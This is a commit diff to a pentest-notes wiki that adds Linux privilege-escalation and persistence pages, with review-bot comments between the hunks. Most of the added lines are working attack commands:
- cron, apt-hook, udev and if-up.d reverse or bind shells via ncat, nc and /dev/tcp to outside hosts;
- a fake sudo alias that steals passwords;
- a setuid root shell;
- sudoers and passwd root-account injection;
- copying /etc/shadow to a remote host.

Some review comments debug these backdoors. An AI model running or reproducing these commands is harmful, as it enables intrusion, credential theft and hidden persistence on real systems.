
Commit 30a77c7

committed
update
1 parent 50acc9e commit 30a77c7

18 files changed, +119 -10 lines changed

wiki/README.md

+6-1
Original file line numberDiff line numberDiff line change
@@ -169,7 +169,7 @@
169169
- [Linux-Exploit-Suggester](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux-Exploit-Suggester.md)
170170
- [一些检测工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/一些检测工具.md)
171171
- [Linux计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux计划任务.md)
172-
- [passwd文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/passwd文件提权.md)
172+
- [可写文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/可写文件提权.md)
173173
- [Sudo提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Sudo提权.md)
174174
- [Linux SUID提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/LinuxSUID提权.md)
175175
- [漏洞提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/漏洞提权.md)
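Review bot: the rename of the index entry passwd文件提权 to 可写文件提权 is applied by hand in three places in this commit (wiki/README.md, wiki/权限提升/README.md and wiki/权限提升/Linux提权/README.md), and the 权限维持 lists further down are duplicated the same way across wiki/README.md, wiki/权限维持/README.md and wiki/权限维持/Linux/README.md. Keeping a single list, or generating these indexes from the directory tree, would avoid the three-way edits and the drift they invite when one copy is missed.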
@@ -515,6 +515,11 @@
515515
- [SSH wrapper后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH-wrapper后门.md)
516516
- [Strace记录ssh密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Strace记录ssh密码.md)
517517
- [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
518+
- [apt后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/apt后门.md)
519+
- [bash_rc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/bash_rc.md)
520+
- [后门驱动程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/后门驱动程序.md)
521+
- [启动项服务后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/启动项服务后门.md)
522+
- [用户启动文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/用户启动文件.md)
518523
- [web服务&中间件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/README.md)
519524
- [Apache](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/Apache.md)
520525
- [IIS](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/IIS.md)

wiki/权限提升/Linux提权/Linux计划任务.md

+10
@@ -1,3 +1,13 @@
1+
crontab -l
2+
ls -alh /var/spool/cron;
3+
ls -al /etc/ | grep cron
4+
ls -al /etc/cron*
5+
cat /etc/cron*
6+
cat /etc/at.allow
7+
cat /etc/at.deny
8+
cat /etc/cron.allow
9+
cat /etc/cron.deny*
10+
111
>for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done 列举所有用户的crontab
212
$cat /etc/crontab
313
$echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' >test.sh
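Review bot: `cat /etc/cron*` on line 5 hits the directories /etc/cron.d, /etc/cron.daily and friends and prints "Is a directory" errors rather than their contents; `cat /etc/crontab /etc/cron.d/*` (and likewise for the hourly/daily/weekly/monthly directories) reads the files, while `ls -al /etc/cron*` on line 4 already gives the listing. `cat /etc/cron.deny*` on line 9 carries a stray glob, and the `;` after `ls -alh /var/spool/cron` on line 2 does nothing. These are the same locations a review for unauthorized scheduled tasks walks through, so an exact list is as useful to the defender checking a host as to the enumeration.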

wiki/权限提升/Linux提权/README.md

+1-1
@@ -3,7 +3,7 @@
33
- [Linux-Exploit-Suggester](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux-Exploit-Suggester.md)
44
- [一些检测工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/一些检测工具.md)
55
- [Linux计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux计划任务.md)
6-
- [passwd文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/passwd文件提权.md)
6+
- [可写文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/可写文件提权.md)
77
- [Sudo提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Sudo提权.md)
88
- [Linux SUID提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/LinuxSUID提权.md)
99
- [漏洞提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/漏洞提权.md)

wiki/权限提升/Linux提权/Sudo提权.md

+6-1
@@ -31,4 +31,9 @@
3131
>id
3232
>whoami
3333
>sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234
34-
>sudo scp /etc/shadow aarti@192.168.1.105:~/
34+
>sudo scp /etc/shadow aarti@192.168.1.105:~/
35+
36+
工具
37+
https://github.com/TH3xACE/SUDO_KILLER
38+
sudo_inject
39+
https://github.com/nongiach/sudo_inject
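Review bot: the new 工具 section names sudo_inject (line 38) but lists SUDO_KILLER as a bare URL on line 37; give each tool a name and a one-line statement of what it checks, matching the description-then-URL layout of 一些检测工具.md. Line 34 is shown removed and re-added with identical content, which is a whitespace-only change (most likely the missing trailing newline); the same churn appears in several files in this commit and is avoided by having the editor end files with a newline.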

wiki/权限提升/Linux提权/一些检测工具.md

+7-1
@@ -3,4 +3,10 @@
33
枚举基本系统信息并搜索常见的权限提升向量,例如世界可写文件、错误配置、明文密码和适用的漏洞利用
44
http://www.securitysift.com/download/linuxprivchecker.py
55
检查文件权限、cron 作业(如果可见)、弱凭据等
6-
https://github.com/rebootuser/LinEnum
6+
https://github.com/rebootuser/LinEnum
7+
提权脚本
8+
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
9+
枚举工具
10+
https://github.com/diego-treitos/linux-smart-enumeration
11+
https://github.com/AlessandroZ/BeRoot
12+
https://github.com/pentestmonkey/unix-privesc-check
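Review bot: the description-then-URL layout of lines 3 to 6 breaks down for the new entries: 枚举工具 on line 9 is followed by three URLs, so BeRoot and unix-privesc-check on lines 11 and 12 end up with no description, and 提权脚本 on line 7 says nothing about what distinguishes linPEAS from the scripts above it. One short line per tool, as for linuxprivchecker and LinEnum, keeps the page usable as a reference.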

wiki/权限提升/Linux提权/passwd文件提权.md wiki/权限提升/Linux提权/可写文件提权.md

+19-1
@@ -1,3 +1,8 @@
1+
#### 列出系统中可写文件
2+
>find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
3+
>find / -perm -2 -type f 2>/dev/null
4+
>find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
5+
#### passwd文件
16
$ls –lh /etc/passwd 若是任何用户可读写
27
$perl -le 'print crypt("password@123","addedsalt")' 生成密码或php -r "print(crypt('aarti','123') . \"\n\");"或python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'
38
$echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
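Review bot: lines 3 and 4 under 列出系统中可写文件 duplicate each other, the only difference being the `/proc` exclusion, so line 3 can go; line 2 already excludes both `/proc` and `/sys`, and line 4 should do the same so the two outputs are comparable. `-exec ls -al {} \;` on line 2 spawns one ls per match, `-exec ls -al {} +` batches them. This is the same search a hardening review runs for world-writable files outside /tmp, so one exact command serves both sides.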
@@ -11,4 +16,17 @@
1116
>useradd newuser;echo "newuser:password"|chpasswd
1217
>useradd -p `openssl passwd 123456` guest
1318
>useradd -p "$(openssl passwd 123456)" guest
14-
>useradd newuwer;echo -e "123456\n123456\n" |passwd newuser
19+
>useradd newuwer;echo -e "123456\n123456\n" |passwd newuser
20+
#### /etc/sysconfig/network-scripts/
21+
NAME=Network /bin/id <= 注意空格
22+
ONBOOT=yes
23+
DEVICE=eth0
24+
25+
EXEC :
26+
./etc/sysconfig/network-scripts/ifcfg-1337
27+
#### sudoers
28+
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers
29+
30+
无需密码使用sudo
31+
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
32+
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
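Review bot: line 19 creates `newuwer` but sets the password for `newuser`, so the two names need to agree (line 16 has the spelling right). Under /etc/sysconfig/network-scripts/, the `EXEC :` line 26 gives `./etc/sysconfig/network-scripts/ifcfg-1337` with a leading dot, which is neither an absolute path nor a shell command; clarify what it denotes. For the sudoers lines 28 to 32, appending to /etc/sudoers directly skips the syntax check and lock that `visudo` provides, and a single malformed line disables sudo for every user; `visudo -c` validates the file afterwards. /etc/sudoers and /etc/sudoers.d are standard file-integrity-monitoring targets for exactly this reason.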

wiki/权限提升/Linux提权/查找可能泄露的密码.md

+2
@@ -8,6 +8,8 @@
88
>cat ~/.atftp_history
99
>cat ~/.mysql_history
1010
>cat ~/.php_history
11+
>grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
12+
>find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
1113
##### 尝试查找私钥
1214
>cat ~/.ssh/authorized_keys
1315
>cat ~/.ssh/identity.pub
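Review bot: line 11 passes `--color` twice (`--color=auto` and `--color=always`), and `-rnw '/'` recurses the whole filesystem including /proc and /sys, which floods the output and can stall on pseudo-files; `--exclude-dir={proc,sys,dev,run}` or a starting point such as /etc, /home, /var and /opt lets it finish. `-w` also drops hits where the token is embedded in a longer word such as `db_password`, which is worth noting next to the command. Line 12 runs one grep per file through `-exec ... \;`; `-exec grep -i -I "PASSWORD" {} +` does the same with far fewer processes and prints filenames on its own, so the `/dev/null` trick is no longer needed. A credential-hygiene audit runs these same searches, so the precise form benefits the defender as much as the tester.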

wiki/权限提升/Linux提权/通配符提权.md

+4-1
@@ -27,4 +27,7 @@
2727
>root
2828
>find f1 -exec "/bin/sh" \;
2929
>id
30-
>whoami
30+
>whoami
31+
32+
工具
33+
https://github.com/localh0t/wildpwn

wiki/权限提升/README.md

+1-1
@@ -44,7 +44,7 @@
4444
- [Linux-Exploit-Suggester](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux-Exploit-Suggester.md)
4545
- [一些检测工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/一些检测工具.md)
4646
- [Linux计划任务](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Linux计划任务.md)
47-
- [passwd文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/passwd文件提权.md)
47+
- [可写文件提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/可写文件提权.md)
4848
- [Sudo提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/Sudo提权.md)
4949
- [Linux SUID提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/LinuxSUID提权.md)
5050
- [漏洞提权](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限提升/Linux提权/漏洞提权.md)

wiki/权限维持/Linux/Linux-cron后门.md

+3-1
@@ -3,4 +3,6 @@
33
![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/571.png)
44

55
#!bash
6-
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
6+
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/192.168.1.1/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
7+
8+
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
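Review bot: line 8 pipes into `crontab` with no file argument, whereas line 6 uses `crontab -`; without the `-` most crontab implementations print a usage error, which the `2> /dev/null` then hides, so the two lines should be made consistent. On the detection side, the `\r` plus `no crontab for ...%100c` padding on line 6 only fools a terminal: `crontab -l | cat -A` or reading the spool file under /var/spool/cron directly shows the hidden entry, and both lines write to that spool, where file-integrity monitoring sees the change.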

wiki/权限维持/Linux/README.md

+6-1
@@ -9,4 +9,9 @@
99
- [SSH公私钥登录](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH公私钥登录.md)
1010
- [SSH wrapper后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH-wrapper后门.md)
1111
- [Strace记录ssh密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Strace记录ssh密码.md)
12-
- [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
12+
- [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
13+
- [apt后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/apt后门.md)
14+
- [bash_rc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/bash_rc.md)
15+
- [后门驱动程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/后门驱动程序.md)
16+
- [启动项服务后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/启动项服务后门.md)
17+
- [用户启动文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/用户启动文件.md)

wiki/权限维持/Linux/SUID-Shell.md

+8-1
@@ -1,3 +1,10 @@
11
>cp /bin/bash /tmp/tmp
22
>chmod u+s /tmp/tmp
3-
>/tmp/tmp -p
3+
>/tmp/tmp -p
4+
或者
5+
>TMPDIR2="/var/tmp"
6+
>echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
7+
>gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
8+
>rm $TMPDIR2/croissant.c
9+
>chown root:root $TMPDIR2/croissant
10+
>chmod 4777 $TMPDIR2/croissant
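Review bot: neither variant states that it has to be run as root, which the page should say up front: the cp/chmod form on lines 1 to 3 only yields a root-SUID binary if the copy is owned by root, and the second form needs root for `chown root:root` on line 9. Both leave a root-owned setuid file under /tmp or /var/tmp, which mounting those filesystems with `nosuid` neutralizes and a `find / -perm -4000 -user root` sweep, filtered against package-managed paths, surfaces; `chmod 4777` on line 10 additionally makes the binary world-writable, so a permissions audit flags it twice.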

wiki/权限维持/Linux/apt后门.md

+3
@@ -0,0 +1,3 @@
1+
如果您可以使用以下命令在apt.conf.d目录中创建一个文件:APT::Update::Pre-Invoke {"CMD"}; 下次"apt-get update"完成时,CMD 将被执行!
2+
3+
echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
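Review bot: the description on line 1 reads like a machine translation and gets the timing wrong: `APT::Update::Pre-Invoke` runs the command before each `apt-get update`, not when it completes (that is `Post-Invoke`). Reword it to say that apt parses every file under /etc/apt/apt.conf.d and that Pre-Invoke hooks run as root before the update. For the audit side, `apt-config dump | grep -i invoke` lists every configured hook, and since /etc/apt/apt.conf.d is root-owned, a new file there is a clear file-integrity event.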

wiki/权限维持/Linux/bash_rc.md

+23
@@ -0,0 +1,23 @@
1+
TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
2+
cat << EOF > /tmp/$TMPNAME2
3+
alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
4+
EOF
5+
if [ -f ~/.bashrc ]; then
6+
cat /tmp/$TMPNAME2 >> ~/.bashrc
7+
fi
8+
if [ -f ~/.zshrc ]; then
9+
cat /tmp/$TMPNAME2 >> ~/.zshrc
10+
fi
11+
rm /tmp/$TMPNAME2
12+
13+
或在其 .bashrc 文件中添加以下行。
14+
>chmod u+x ~/.hidden/fakesudo
15+
>echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
16+
创建fakesudo脚本。
17+
read -sp "[sudo] password for $USER: " sudopass
18+
echo ""
19+
sleep 2
20+
echo "Sorry, try again."
21+
echo $sudopass >> /tmp/pass.txt
22+
23+
/usr/bin/sudo $@
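Review bot: the fakesudo script on lines 17 to 23 follows the install lines 14 and 15 with nothing marking it as the contents of ~/.hidden/fakesudo, and it has no shebang; separate it and label it as its own file. In the heredoc on lines 2 to 4 the EOF delimiter is unquoted, so `$(locale | ...)` is evaluated when the file is written while `\$locale`, `\$USER` and `\$pwd` are deferred; if freezing the locale at install time is intended, say so, because the mix reads like an oversight. For defenders, both variants live entirely in the user's rc files: `type sudo` reporting an alias instead of /usr/bin/sudo and modification-time changes on ~/.bashrc or ~/.zshrc are the tells, and the second variant writes the captured password to the world-readable /tmp/pass.txt.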
@@ -0,0 +1 @@
1+
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
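Review bot: this hunk and the two after it carry no file path in the rendered diff, so the reader can only guess from the README links which of 后门驱动程序, 启动项服务后门 and 用户启动文件 each belongs to; each page should open with a line saying what it is. `$RSHELL` here is expanded by the calling shell when `tee` runs, yet it is only defined in the next hunk, so the rule is written with an empty RUN+= unless that other snippet is sourced first; the dependency needs stating. The rule runs as root on every USB device add, which is why `grep -r 'RUN+=' /etc/udev/rules.d` is a routine audit step, and a file named like a VirtualBox kernel-driver rule that contains a shell command is exactly the mismatch such a review looks for.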
@@ -0,0 +1,2 @@
1+
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
2+
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
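Review bot: `\$RSHELL` on line 2 is escaped inside double quotes, so sed inserts the literal text `$RSHELL` at line 4 of the if-up.d script rather than the command defined on line 1, and at interface-up time that variable is not in the script's environment; the page should say which is meant, and define `$LMTHD`, `$LHOST` and `$LPORT`, which appear nowhere else in the commit. Scripts under /etc/network/if-up.d run as root whenever an interface comes up, so that directory's contents and modification times belong on the file-integrity list alongside the cron and udev locations elsewhere in this commit.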
@@ -0,0 +1,12 @@
1+
写入文件
2+
~/.config/autostart/NAME_OF_FILE.desktop
3+
4+
In : ~/.config/autostart/*.desktop
5+
6+
[Desktop Entry]
7+
Type=Application
8+
Name=Welcome
9+
Exec=/var/lib/gnome-welcome-tour
10+
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
11+
OnlyShowIn=GNOME;
12+
X-GNOME-Autostart-enabled=false
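Review bot: the sample entry on lines 6 to 12 is the stock gnome-welcome-tour autostart file pasted verbatim, complete with `X-GNOME-Autostart-enabled=false` and an `AutostartCondition` tied to a marker file; label it as a format sample and explain which keys matter, since a reader cannot tell which lines are the template and which are the point. Line 4 (`In : ~/.config/autostart/*.desktop`) repeats line 2 in English; keep one. On the defensive side, per-user entries under ~/.config/autostart and system-wide ones under /etc/xdg/autostart are both worth listing, with attention to the `Exec=` value of any entry not owned by an installed package.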

wiki/权限维持/README.md

+5
@@ -63,6 +63,11 @@
6363
- [SSH wrapper后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SSH-wrapper后门.md)
6464
- [Strace记录ssh密码](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/Strace记录ssh密码.md)
6565
- [SUID Shell](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/SUID-Shell.md)
66+
- [apt后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/apt后门.md)
67+
- [bash_rc](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/bash_rc.md)
68+
- [后门驱动程序](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/后门驱动程序.md)
69+
- [启动项服务后门](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/启动项服务后门.md)
70+
- [用户启动文件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/Linux/用户启动文件.md)
6671
- [web服务&中间件](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/README.md)
6772
- [Apache](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/Apache.md)
6873
- [IIS](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/权限维持/web服务&中间件/IIS.md)
